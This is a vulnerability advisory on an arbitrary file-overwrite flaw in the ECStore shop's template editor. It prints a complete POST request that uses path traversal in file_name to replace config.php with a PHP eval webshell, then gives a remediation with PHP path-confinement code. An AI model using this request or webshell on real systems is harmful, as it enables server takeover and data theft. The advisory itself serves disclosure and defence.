ECStore open source online shop system: arbitrary file modification vulnerability leading to a shell

2015-03-03T00:00:00
ID MYHACK58:62201559567
Type myhack58
Reporter Asuimu@乌云
Modified 2015-03-03T00:00:00

Description

Brief description:

In the template editor's file edit function, the restriction on which file may be edited is not strict, so any file that exists on the system may be modified.

Detailed description:

In the file editing function, select a file to modify, here an image template file. Then, when uploading the picture, set the file_name parameter to any PHP file on the site, such as /index.php or /config/config.php, and set the image content to the shell content.


The POST data is as follows:

    POST /index.php/shopadmin/index.php?app=site&ctl=admin_explorer_theme&act=save_image HTTP/1.1
    Host: shop.xxx.com
    Content-Length: 846527
    Cache-Control: max-age=0
    Accept-Encoding: gzip,deflate
    Accept-Language: EN-us,EN;q=0.8,en;q=0.6
    Cookie: xxxxxxxxx

    ------WebKitFormBoundaryHSNjVhgvrpnTmmqd
    Content-Disposition: form-data; name="theme"

    ecstore
    ------WebKitFormBoundaryHSNjVhgvrpnTmmqd
    Content-Disposition: form-data; name="open_path"

    ------WebKitFormBoundaryHSNjVhgvrpnTmmqd
    Content-Disposition: form-data; name="file_name"

    ../../config/config.php
    ------WebKitFormBoundaryHSNjVhgvrpnTmmqd
    Content-Disposition: form-data; name="upfile"; filename="Desert.jpg"
    Content-Type: image/jpeg

    <?php @eval($_POST['chopper']);?>
    ------WebKitFormBoundaryHSNjVhgvrpnTmmqd
    Content-Disposition: form-data; name="has_bak"

    1
    ------WebKitFormBoundaryHSNjVhgvrpnTmmqd--


Similarly, the same problem exists when editing an HTML or XML file.


Vulnerability proof:

Successful connection to the webshell


The shell was obtained and the config file was modified, but the site went down...

Repair solutions:

Restrict the value of the file_name parameter so that it cannot be used to modify files outside the template directory.
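
One way to implement this restriction, as an added example that is not ECStore's code or the reporter's: canonicalise file_name, require it to stay inside the theme directory, and allow only the extensions valid for the action (the HTML and XML editors would pass their own list). The function name resolveThemeFile, the directory layout and the extension list are assumptions, as is the premise that the save action only overwrites files that already exist.

```php
<?php
declare(strict_types=1);

// Added example, not ECStore code. Function name, directory layout and
// extension list are assumptions made for illustration.
function resolveThemeFile(string $themeRoot, string $fileName, array $allowedExt): string
{
    $root = realpath($themeRoot);
    if ($root === false || !is_dir($root)) {
        throw new RuntimeException('theme root not found');
    }
    if ($fileName === '' || strpos($fileName, "\0") !== false) {
        throw new InvalidArgumentException('empty or malformed file_name');
    }
    // realpath() collapses "../" and follows symlinks; the edit feature only
    // overwrites existing files, so a path that does not resolve is rejected.
    $target = realpath($root . DIRECTORY_SEPARATOR . $fileName);
    if ($target === false || !is_file($target)) {
        throw new InvalidArgumentException('file_name does not resolve to a file');
    }
    // Compare with a trailing separator so "/themes/ecstore2" cannot pass
    // as being inside "/themes/ecstore".
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        throw new InvalidArgumentException('file_name escapes the theme directory');
    }
    // An image upload may only replace an image, never .php/.html/.xml.
    $ext = strtolower(pathinfo($target, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        throw new InvalidArgumentException('extension not allowed for this action');
    }
    return $target;
}

// Constructed sample layout in a temp directory, so the check runs offline.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ecstore_demo_' . bin2hex(random_bytes(4));
mkdir("$base/themes/ecstore/images", 0700, true);
mkdir("$base/config", 0700, true);
file_put_contents("$base/themes/ecstore/images/banner.jpg", 'constructed image');
file_put_contents("$base/themes/ecstore/index.html", 'constructed template');
file_put_contents("$base/config/config.php", 'constructed config');

foreach (['images/banner.jpg', '../../config/config.php', 'index.html'] as $name) {
    try {
        echo $name, ' => ', resolveThemeFile("$base/themes/ecstore", $name, ['jpg', 'png', 'gif']), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo $name, ' => rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

The path check alone does not inspect the uploaded bytes; the extension allowlist is what keeps an image upload from landing in a file the server would execute.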